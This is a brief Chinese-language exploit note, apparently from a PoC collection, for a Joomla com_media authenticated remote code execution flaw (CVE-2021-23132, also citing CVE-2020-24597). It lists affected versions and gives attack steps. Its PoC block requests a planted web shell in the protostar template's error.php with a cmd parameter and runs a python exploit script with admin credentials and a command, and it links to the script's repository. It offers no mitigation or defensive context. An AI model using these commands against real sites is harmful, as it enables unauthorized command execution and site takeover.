Joomla com_media 后台 RCE (CVE-2021-23132).md
506 B / 2021-05-21 09:14:38
# Joomla com_media 后台 RCE (CVE-2021-23132)
影响版本:
Joomla core <=3.9.24
* CVE-2021-23132 com_media allowed paths that are not intended for image uploads to RCE.
* CVE-2020-24597 Directory traversal in com_media to RCE
步骤:
获取超级管理员权限,触发RCE。
**PoC:**
```
http://target/templates/protostar/error.php?cmd=ls
python3 cve-2021-23132.py -url http://192.168.72.140 -u admin -p 1234 -rce 1 -cmd ls
```
poc.py:https://github.com/HoangKien1020/CVE-2021-23132